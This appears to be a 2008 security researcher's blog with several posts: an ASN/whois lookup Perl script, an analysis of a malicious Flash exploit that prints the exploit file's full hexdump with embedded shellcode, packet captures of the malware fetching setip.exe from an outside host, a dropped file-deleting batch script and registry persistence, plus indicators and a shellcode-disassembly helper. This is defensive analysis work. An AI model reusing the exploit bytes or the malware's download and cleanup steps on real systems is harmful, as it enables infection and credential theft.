Sunday, July 13, 2008

USB as a Threat Vector

Over the past weeks I have monitored several incidences per week of clients bringing in infected USB media and hard drives. It seems that the USB-aware malware is increasing and becoming a more common feature of Internet-delivered maladies. This allows the malware access to infect machines laterally within an organization, as well as directly from the Internet.

Wednesday, July 2, 2008

Script to identify domains and IP addresses by ASN and CC

I wrote this more than a year ago and it has been tested pretty well. Figured since Jim over at ISC has released a similar tool, it's time to publish mine.

Usage:
# cat > queries.txt
domain1
domain2
ip3
domain4
ip5
...
^C
# perl finger.pl queries.txt

###### finger.pl ######

#This work is licensed under the Creative Commons Attribution-Share Alike 3.0 United States License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/3.0/us/ or send a letter to Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA.


if (-e "$ARGV[0]") {
open (IFILE, "$ARGV[0]");
while () {
chomp;
undef $ipaddr; undef @whois_results; undef @resolve_results; undef $domainname; undef $a; undef @results; undef @resultr;
if (/^\s*$/) {
next;
} elsif (/^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
$ipaddr = $_;
@whois_results = &whois($ipaddr);
foreach $a (@whois_results) {
print "$a\n";
}
} elsif (/.+?\...?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif (/.+?\....?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif (/.+?\.....?$/) {
$domainname = $_;
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}

} else { print "BAD INPUT LINE: $_\n"; }
}
} elsif ($ARGV[0] =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
$ipaddr = $ARGV[0];
@whois_results = &resolve($ipaddr);
# @whois_results = &whois($ipaddr);
foreach $a (@whois_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\...?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\....?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}
} elsif ($ARGV[0] =~ /.+?\.....?$/) {
$domainname = $ARGV[0];
@resolve_results = &resolve($domainname);
foreach $a (@resolve_results) {
print "$a\n";
}

} else { print "BAD INPUT: $ARGV[0]\n"; }


sub resolve {
undef $domain; undef @answersr; undef $answerr; undef @reresolve; undef @resultr; undef $infor;
my $domain = shift;
if ($domain =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
my @answersr = `dig +short -x $domain`;
@resultr;
foreach my $answerr (@answersr) {
my @whois_resultr = &whois($domain);
foreach my $whois_answerr (@whois_resultr) {
if ($answerr =~ /^\s*$/) {
$infor = join(' | ', "NO RDNS", $whois_answerr);
} else {
$infor = join(' | ', substr($answerr,0,$answerr-1), $whois_answerr);
}
@resultr = (@resultr,$infor);
}
}
return @resultr;
# } elsif ($domain =~ /.+?\.....?\.?$/) {
} else {
my @answersr = `dig +short $domain`;
chomp(@answersr);
@resultr;
foreach my $answerr (@answersr) {
if ($answerr =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
my @whois_resultr = &whois($answerr);
foreach my $whois_answerr (@whois_resultr) {
$infor = join(' | ', $domain, $whois_answerr);
@resultr = (@resultr,$infor);
}
# } elsif ($answerr =~ /.+?\.....?\.$/) {
} else {
my @reresolve = &resolve(substr($answerr,0,$answerr-1));
foreach $reresolve (@reresolve) {
@resultr = (@resultr,$reresolve);
}
# } else { print "COULD NOT RESOLVE: $domain\n"; }
}
}
return @resultr;
# } else {
# print "BAD DOMAIN: $domain\n";
# return("$domain \| UNKNOWN");
}
}


sub whois {
undef $octet1; undef $octet2; undef $octet3; undef $octet4;
undef @answers; undef @results;

my $ip = shift;
if ($ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) {
my $octet1 = $1;
my $octet2 = $2;
my $octet3 = $3;
my $octet4 = $4;

# Perform the IP WHOIS lookup and parse the result
my @answers = `dig +short -t TXT $octet4\.$octet3\.$octet2\.$octet1\.origin\.asn\.cymru\.com`;
chomp(@answers);
foreach my $answer (@answers) {
undef @afields;
undef $ip_as; undef $ip_netblock; undef $ip_cc; undef $ip_as_source; undef $ip_as_date;
undef $as_num; undef $as_cc; undef $as_source; undef $as_date; undef $as_desc;
undef $info;

$answer =~ s/\t//g;
$answer =~ s/\"//g;
$answer =~ s/\s\|\s/\|/g;
my @afields = (split/\|/,$answer);
my $ip_as = $afields[0];
my $ip_netblock = $afields[1];
my $ip_cc = $afields[2];
my $ip_as_source = $afields[3];
my $ip_as_date = $afields[4];

# Perform the AS WHOIS lookup and parse the result
$answer = `dig +short -t TXT AS$ip_as\.asn\.cymru\.com`;
chomp($answer);
$answer =~ s/\t//g;
$answer =~ s/\"//g;
$answer =~ s/\s\|\s/\|/g;
my @afields = (split/\|/,$answer);
my $as_num = $afields[0];
my $as_cc = $afields[1];
my $as_source = $afields[2];
my $as_date = $afields[3];
my $as_desc = $afields[4];

my $info = join(' | ',sprintf("%15.15s",$ip),sprintf("%18.18s",$ip_netblock),sprintf("%2.2s",$ip_cc),sprintf("%5.5s",$ip_as),$as_desc);
@results = (@results,$info);
}

return(@results);
} else {
print "BAD IP ADDRESS: $ip\n";
return("$ip \| UNKNOWN");
}

}

Wednesday, May 28, 2008

Malicious Flash Badness

This started after reading the first entry of this SANS story: http://isc.sans.org/diary.html?storyid=4468

Tooled with the dropper, did a little Flash version research and discovered this link worked out:

www_play0nlnie_com/pcd/topics/ff11us/20080311cPxl31/WIN%209,0,115,0ie.swf

FLARE/FLASM scream about overflow of tags.

bt collectedfiles # cat
__20080527-1113_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_flr
movie 'WIN 9,0,115,0ie.swf' {
// flash 9, total frames: 771, frame rate: 12 fps, 550x400 px

// unknown tag 86 length 40

// unknown tag 86 length 12

// unknown tag 82 length 383

// unknown tag 76 length 25
}


SWF hex

bt collectedfiles # hexdump -C
__20080527-1342_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_swf
00000000 46 57 53 09 0a 06 00 00 78 00 05 5f 00 00 0f a0 |FWS.....x.._....|
00000010 00 00 0c 03 03 44 11 08 00 00 00 bf 01 00 04 00 |.....D..........|
00000020 00 aa 02 34 d1 f5 25 13 ed 2b 45 e9 a8 90 9b 67 |...4..%..+E....g|
00000030 65 1d aa d1 5a b0 ec 91 05 6f 6b 7e 4f 9a 2a 62 |e...Z....ok~O.*b|
00000040 06 f4 a0 6d a4 3b ca c9 15 2e a8 e6 e6 40 ca 36 |...m.;.......@.6|
00000050 2d 4a ab dd 70 01 fe 25 78 ed b9 a3 54 30 f4 f1 |-J..p..%x...T0..|
00000060 cf d2 f2 e3 e1 63 e6 85 34 35 45 77 33 e4 3d 4b |.....c..45Ew3.=K|
00000070 72 10 af 86 45 59 a3 f8 c1 27 29 75 ae 34 28 2b |r...EY...')u.4(+|
00000080 7c e5 7d a7 57 7c ee c8 e6 0c d0 91 4c df f4 41 ||.}.W|......L..A|
00000090 04 27 a8 94 9a 18 e4 0e 7d 63 02 b3 bf 22 76 12 |.'......}c..."v.|
000000a0 1d 24 02 10 a6 3d 5d 3e 4c 73 ab bf b6 c2 d7 88 |.$...=]>Ls......|
000000b0 af bd ab 68 75 cc b2 b9 4d 5c b5 30 ae a5 f5 82 |...hu...M\.0....|
000000c0 42 74 69 03 37 8e 94 e2 87 22 d3 9e bc 57 2d 64 |Bti.7...."...W-d|
000000d0 cc 76 f3 72 9e 3c 5d a4 58 c1 d5 53 64 a0 a4 a8 |.v.r.<].X..Sd...|
000000e0 84 32 c0 7d b4 91 d8 8a c2 3f 70 5e e6 17 24 60 |.2.}.....?p^..$`|
000000f0 eb 16 5b 33 c9 66 b8 d8 15 66 31 04 4b 41 40 66 |..[3.f...f1.KA@f|
00000100 81 f9 63 01 7c f3 eb 05 e8 e5 ff ff ff 31 70 db |..c.|........1p.|
00000110 15 da 4a b1 25 85 71 56 14 55 8d 77 15 e0 15 6a |..J.%.qV.U.w...j|
00000120 55 ee 9e 93 09 49 9e 8d 1d 6d e2 66 f9 e8 17 e9 |U....I...m.f....|
00000130 15 6f ce 9e 12 2b 53 c9 dc bc 4b bc 7f f9 4c 19 |.o...+S...K...L.|
00000140 fb f3 15 f3 f7 0d 55 75 2d 35 60 0d 9c be 25 93 |......Uu-5`...%.|
00000150 17 a3 fd 65 14 fc 15 1f ec 94 14 a6 7d 6f 78 01 |...e........}ox.|
00000160 16 6a 63 71 7a 69 42 8e 10 ee 06 06 16 08 83 e1 |.jcqziB.........|
00000170 a8 0b 16 0b 7e 31 56 0d 16 64 e9 65 e9 2e cd 3d |....~1V..d.e...=|
00000180 32 42 46 47 e9 42 36 9e d2 7e e9 e8 e9 e7 7e e6 |2BFG.B6..~....~.|
00000190 e9 e5 e9 4f 46 e3 40 01 5e 6b 15 e0 40 30 7c 11 |...OF.@.^k..@0|.|
000001a0 4f 46 9d 3a 9b 8f 16 21 16 26 9d bc be 28 16 29 |OF.:...!.&...(.)|
000001b0 9d d7 40 c2 f6 2c 16 2d 48 dd b3 71 9d 4e 32 d9 |..@..,.-H..q.N2.|
000001c0 33 33 16 33 7c 2e 7c 38 7c 36 9d f2 15 3c 8a ff |33.3|.|8|6...<..|
000001d0 11 52 51 90 d0 3b d5 b6 68 16 fe 35 17 40 16 2b |.RQ..;..h..5.@.+|
000001e0 2b 28 20 29 31 cf d3 46 12 da d0 40 7e 0f bd 8f |+( )1..F...@~...|
000001f0 11 89 9d 35 0e a4 f9 4d 16 4e 7e 27 1e 5a 16 39 |...5...M.N~'.Z.9|
00000200 7e 5a 1c 53 7e 01 9d b9 7c dd 12 cb bd 6b d6 09 |~Z.S~...|....k..|
00000210 46 30 e9 d0 12 c0 bc d0 a8 6d 17 5f 16 37 7e 9e |F0.......m._.7~.|
00000220 16 62 16 9c 40 60 15 a2 d1 66 79 15 6c 46 d1 29 |.b..@`...fy.lF.)|
00000230 12 0f 6e 0e 16 3b e9 3b 1e 5d cd 3c 45 27 9b 37 |..n..;.;.].<E'.7|
00000240 22 22 45 8c 40 58 25 b5 9d 8a 7c 65 4f d3 f4 84 |""E.@X%...|eO...|
00000250 70 bd 52 5f 2a 7d 17 f6 ea f3 51 6f 47 d7 46 d0 |p.R_*}....QoG.F.|
00000260 47 d3 47 d2 47 d5 9b 13 25 87 16 87 44 d9 e9 df |G.G.G...%...D...|
00000270 1a 0b d2 df 14 8c 16 ec e9 ff fa 4d 12 90 9d c7 |...........M....|
00000280 26 d3 4d c1 15 75 15 74 15 77 15 76 95 74 12 c3 |&.M..u.t.w.v.t..|
00000290 45 11 cc 79 e1 ce e9 7d fe 85 e9 60 e9 ca 3f f9 |E..y...}...`..?.|
000002a0 20 2f 42 87 12 69 38 67 36 a6 7c 97 4e 12 16 aa | /B..i8g6.|.N...|
000002b0 e8 d5 e9 b9 d4 8c 16 c7 24 f6 ac af 15 4e 69 4e |........$....NiN|
000002c0 04 70 32 b3 ae 44 16 b5 16 80 9b e3 32 bc db 97 |.p2..D......2...|
000002d0 d4 ae 16 03 03 bd 16 bd fd bb ae a0 17 c0 16 7b |...............{|
000002e0 16 c1 e8 bc e9 d6 d4 d1 16 94 42 ad 12 a2 36 9e |..........B...6.|
000002f0 e9 9c 02 91 d5 9d 9d 88 2a 8b 9d 93 3e af 5b d2 |........*...>.[.|
00000300 cb 59 05 d0 c3 e7 df 9c 57 5d 12 5d 9b 9c 3e db |.Y......W].]..>.|
00000310 76 e9 df d4 a8 cc 2c 0b 62 d6 d7 16 11 e3 dc a1 |v.....,.b.......|
00000320 fd 13 2f ec 77 91 f7 6e 55 f6 15 22 9d ec 9e 42 |../.w..nU.."...B|
00000330 4f 29 47 bd 9d 99 2a 66 62 c0 6e ec e3 a6 9d 87 |O)G...*fb.n.....|
00000340 36 f1 e3 c0 df bd 57 58 15 33 25 2c 19 46 06 c3 |6.....WX.3%,.F..|
00000350 c0 8e 1e 3a dd fb 15 27 56 15 e7 c4 09 75 f0 5f |...:...'V....u._|
00000360 9c 5c 33 00 ca 62 9c 09 5c 8d 49 1b 14 d5 9c 0d |.\3..b..\.I.....|
00000370 9c 09 d2 a0 49 55 d4 e5 81 f3 e8 f0 25 64 86 1d |....IU......%d..|
00000380 2e f0 6a 90 6e 2d f1 8d cd 5e 6c 2a 6e 97 db 79 |..j.n-...^l*n..y|
00000390 09 be 73 f4 e7 54 6c 20 8e f4 87 a2 9e 6e ad 3e |..s..Tl .....n.>|
000003a0 e6 6f 32 f6 5a a5 27 34 97 f0 b8 bd 17 28 17 29 |.o2.Z.'4.....(.)|
000003b0 7f 5e 63 5b 2d 03 38 5a 60 59 39 5f 7b 51 6e 01 |.^c[-.8Z`Y9_{Qn.|
000003c0 79 5e 79 5a 72 1a 74 5a 7a 19 76 4f 39 5d 6f 5c |y^yZr.tZz.vO9]o\|
000003d0 17 15 f5 78 4e 13 19 59 6c 18 01 6f 21 ed a7 13 |...xN..Yl..o!...|
000003e0 db 97 bf a1 52 c6 f7 18 c2 ee c1 7e bc 24 43 64 |....R......~.$Cd|
000003f0 bb 2e 44 f8 f7 5d 1d f6 23 28 10 fa 0b 11 91 ec |..D..]..#(......|
00000400 d1 50 dc a4 aa 66 5e e6 df e3 d3 5e 82 a8 30 42 |.P...f^....^..0B|
00000410 00 68 94 36 9a a4 f8 24 e2 78 d1 15 c0 5f cd ce |.h.6...$.x..._..|
00000420 2c a8 15 99 b4 8e a0 08 20 20 20 20 20 20 20 20 |,....... |
00000430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 | |
00000440 20 20 20 20 20 20 20 20 20 20 43 43 02 ff ff ff | CC....|
00000450 bf 15 0c 00 00 00 01 00 e5 9c ba e6 99 af 20 31 |.............. 1|
00000460 00 00 bf 14 7f 01 00 00 01 00 00 00 00 10 00 2e |................|
00000470 00 00 00 00 10 07 6e 65 77 5f 66 6c 61 0c 4d 61 |......new_fla.Ma|
00000480 69 6e 54 69 6d 65 6c 69 6e 65 0d 66 6c 61 73 68 |inTimeline.flash|
00000490 2e 64 69 73 70 6c 61 79 09 4d 6f 76 69 65 43 6c |.display.MovieCl|
000004a0 69 70 14 6e 65 77 5f 66 6c 61 3a 4d 61 69 6e 54 |ip.new_fla:MainT|
000004b0 69 6d 65 6c 69 6e 65 06 66 72 61 6d 65 31 00 0e |imeline.frame1..|
000004c0 61 64 64 46 72 61 6d 65 53 63 72 69 70 74 06 4f |addFrameScript.O|
000004d0 62 6a 65 63 74 0c 66 6c 61 73 68 2e 65 76 65 6e |bject.flash.even|
000004e0 74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68 |ts.EventDispatch|
000004f0 65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |er.DisplayObject|
00000500 11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65 |.InteractiveObje|
00000510 63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |ct.DisplayObject|
00000520 43 6f 6e 74 61 69 6e 65 72 06 53 70 72 69 74 65 |Container.Sprite|
00000530 07 16 01 16 03 18 05 17 01 16 07 16 0a 00 0b 07 |................|
00000540 01 02 07 02 04 07 04 06 07 05 08 07 05 09 07 06 |................|
00000550 0b 07 02 0c 07 02 0d 07 02 0e 07 02 0f 04 00 00 |................|
00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 |................|
00000570 01 02 08 03 00 02 01 03 01 00 01 00 00 01 03 01 |................|
00000580 01 04 01 00 04 00 01 01 09 0a 03 d0 30 47 00 00 |............0G..|
00000590 01 02 01 0a 0b 09 f8 62 8f ff ff 02 02 02 47 00 |.......b......G.|
000005a0 00 02 03 01 0a 0b 0f d0 30 d0 49 00 5d 04 24 00 |........0.I.].$.|
000005b0 60 03 4f 04 02 47 00 00 03 02 01 01 09 27 f8 62 |`.O..G.......'.b|
000005c0 79 f8 62 75 f8 e8 25 fb ff ff 00 f8 29 02 f8 63 |y.bu..%.....)..c|
000005d0 79 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 |y...............|
000005e0 02 02 02 02 47 00 00 3f 13 19 00 00 00 01 00 00 |....G..?........|
000005f0 00 6e 65 77 5f 66 6c 61 2e 4d 61 69 6e 54 69 6d |.new_fla.MainTim|
00000600 65 6c 69 6e 65 00 40 00 00 00 |eline.@...|
0000060a


ISC handler Adrien de Beaupre got the drop calls out. Collecting these, I was able to determine the following:

ax.exe

DNS queries to 'www_1ive_net'. Resolves
82.98.86.169.

0040 ed 90 47 45 54 20 2f 63 6f 75 6e 74 2f 6e 65 77 ..GET /count/new
0050 73 2e 61 73 70 20 48 54 54 50 2f 31 2e 30 0d 0a s.asp HTTP/1.0..
0060 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 Accept: */*..Hos
0070 74 3a 20 77 77 77 2e 31 69 76 65 2e 6e 65 74 0d t: www.1ive.net.
0080 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a .User-Agent: Moz
0090 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 illa/4.0 (compat
00a0 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 ible; MSIE 6.0;
00b0 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 0d Windows NT 5.0).
00c0 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 .Accept-Encoding
00d0 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d : gzip, deflate.
00e0 0a 0d 0a ...

Looks like a tracker. The rest of the return looks like click generation (click fraud).

Drops %system%\disk.dll and test.bat to clean up the retrieved swf.

bt brak # cat WINE_COMPARISON_ax.exe.txt_collection/test.bat
:ha
del "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe"
if exist "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe" goto ha
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.swf"
del %0




Then resolves 'www_play0nlnie_com' to 125.46.104.172 and pulls setip.exe

179 223.948001 192.168.10.22 -> 125.46.104.172 HTTP GET /setip.exe HTTP/1.0

0000 00 02 b3 a1 8d 6f 00 0c 29 fb a3 48 08 00 45 00 .....o..)..H..E.
0010 00 d6 fd ee 40 00 40 06 8b 9a c0 a8 0a 16 7d 2e ....@.@.......}.
0020 68 ac e2 a1 00 50 9b 1a 84 60 ac 79 fe fe 80 18 h....P...`.y....
0030 01 6d 5e 31 00 00 01 01 08 0a df 2a 79 b7 1a 5b .m1.......*y..[
0040 b4 7a 47 45 54 20 2f 73 65 74 69 70 2e 65 78 65 .zGET /setip.exe
0050 20 48 54 54 50 2f 31 2e 30 0d 0a 41 63 63 65 70 HTTP/1.0..Accep
0060 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 74 3a 20 77 77 t: */*..Host: ww
0070 77 2e 70 6c 61 79 30 6e 6c 6e 69 65 2e 63 6f 6d w.play0nlnie.com
0080 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..User-Agent: Mo
0090 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
00a0 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; MSIE 6.0;
00b0 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 Windows NT 5.0)
00c0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
00d0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
00e0 0d 0a 0d 0a ....

Attempts to drop a keylogger, but fails in WINE.

fixme:reg:RegRestoreKeyW (0x50,L"c:\\windows\\temp\\xTemp.sys",8): stub



Drops %system%\smart.dll and sets for start

< [Software\\Cn91x\\Fly] 1211905209
< "DllName"="smart.dll"
< "Shutdown"="DoStartup"
< "Startup"="DoShutdown"


Injects into explorer.exe and iexplore.exe.

So, sum game is backchannel, keylogger, infostealer.gamepass RK. Nice... Similar to last two weeks' SQL injections....

0x0080: 0000 003f 4761 6d65 5573 6572 3d00 020a ...?GameUser=...
0x0090: 0000 0026 4761 6d65 5061 7373 3d00 e516 ...&GamePass=...


Watch for these IPs and domains

www.play0nlnie.com | 125.46.104.172 | 125.40.0.0/13 | CN | 4837 | CHINA169-BACKBONE CNCGROUP China169 Backbone
www.1ive.com | 82.98.86.169 | 82.98.64.0/18 | DE | 12306 | Plus.Line AG IP-Services


Watch for these files

08.swf 201 52d170bd4e7b2c3b7b2276dc4e38cb3f
test.bat 214 83d3d1f07c0e93d985785e0e50bb2280
org.bat 171 6d1c59a28c01e9c77fe75b01090aa9b6
setip.exe 66560 91467a37bc29d35c36e6d054e4d03cc5
disk.dll 484352 c063edc2d2e88f331faddc030137d89c
ax.exe 19456 94237921f585b9926a4d37bd43a4b101
WIN%209,0,115,0ie.swf 1546 4f5f1f3986a302c7c4a5d15a190e9d69
07.swf 200 1dc543c3b15afb0c4d7e416126ac6356
smart.dll 35840 1a2936ad26bd7c497e106745e672884f
07.jpg 1339 5da0fcfd8b8a6fecdebf7441be99416f
news.asp 52901 fd49617f408041e89b3165c92f7c88b5

Sunday, April 20, 2008

Automated Shellcode Analysis

Working with Lenny Zeltser in his SANS Malware Analysis course, I was able to cobble together a script to automate shellcode analysis preparation. The analysis involves wrapping the shellcode in a shell function, then compiling it into a small program. There are several ways to do this, including using an empty C main function (Lenny) and injecting the shellcode into a husk executable (iDefense). I didn't want to use the injection method since it falls prey to two problems. 1) The husk is always the same size, only the shellcode changes (might be good for diff comparisons). I wanted something smaller. 2) The shellcode must fit into the blank space in the husk, which opens it up to possible overflow attack or, at least, shellcode size limitation. Compiling yourself avoids this problem.

Here's the script I hacked together. With a little work, I plan to put it to a CGI frontend with a return of the disassembled output.

Shellcode Analysis Script

bt shellcodetest # cat shellcode_analyzer.sh
#!/bin/sh
# a little script to clean up shellcode, parse it, convert to
little-endian, and compile into the smallest wrapper possible.
# based on instruction provided by Lenny Zelster.

# hacked together by
# Andrew Hunt
# 4/19/08
# Copyright 2008 Creative Commons Share-Alike
# http://creativecommons.org/licenses/by-sa/3.0/us/

# this script is very alpha, assuming you will call with a text file
argument. text file should have the unicode pasted in it,
# like `./shellcode_analyzer.sh shellcode.unicodeorhex.strings.file`.
# it comes without any warranties or promises.
#
# user needs to replace the script path and script for unescaping
unicode/hex/other with the path to their own script or an unescaping
routine.
# some replacement suggestions if you don't have a script...
#
# perl -pe 's/\\x(..)/chr(hex($1))/ge'
# perl -pe 's/[\%\\]u(..)(..)/chr(hex($2$1))/ge'

cat $1 | perl -pe "s/\'\+\'//g" | perl -pe 's/\"\+\"//g' | perl -pe
's/\"//g' | perl -pe "s/\'//g" | perl /mnt/sda1/scripts/unescape.pl >
/tmp/test5.bin

cat /tmp/test5.bin | hexdump | awk '{print $2 $3 $4 $5 $6 $7 $8 $9}' |
perl -pe 's/(..)(..)/print("\"\\x".$2."\\x".$1."\"\n")/ge' | grep -P
'^\"'>/tmp/test6.hex


echo "unsigned char shellcode[]="> /tmp/test7.c
cat /tmp/test6.hex >> /tmp/test7.c
echo ";" >> /tmp/test7.c
echo "int main(){}" >> /tmp/test7.c

gcc -c -o shellcode-compiled /tmp/test7.c
objdump -D shellcode-compiled > shellcode.disasm
rm -f /tmp/test*

# optional
less shellcode.disasm

Friday, February 29, 2008

Phish Me

Last night's NOVASec meeting was an interesting affair. After the presentation by Stratum Security, there was a lively discussion about targeted attacks and how unprepared many organizations are in facing this threat. Intrepidus Group founder Aaron Higbee introduced me to his phishme.com site. Looking over the service, it delivers an essential user training and social engineering testing function by allowing the penetration tester to develop custom targeted emails against a client. It tracks the deliveries, who opens the emails and who clicks the baited links inside, generating a graphical report for delivery to management. This is a great way to gauge the effectiveness of user awareness training programs and identify susceptible users that need retraining. Great product, Intrepidus!

Saturday, February 23, 2008

Idea for End-point Javascript Obfuscation Blocking

I was fortunate enough to attend a presentation by Daniel Peck, of CaffieneMonkey fame, on the characteristics of the javascript obfuscation attack. What struck me the most about the presentation were the graphs Mr. Peck included comparing the object characteristics of malicious scripts. While most scripts have a high number of interfacing calls (doc.write, writeln, print, alert, etc) with rather short 'string' content in their tags to direct the content loading, malicious scripts have relatively few interfacing objects with HUGE strings objects (upwards of 80-90% of the script). Over the graphs of scanned sites he showed, it seems clear this is consistent across malicious v non-malicious sites. If this statistical analysis could be integrated into a plug-in, it would make for a rudimentary, yet effective barrier to obfuscated iframes and droppers. The plug-in would have to prevent script execution based on a user-defined ratio or percentage of calls/string content.

With a skeleton plug-in and the statistical analysis code in CaffieneMonkey open source, integration of the two should be possible.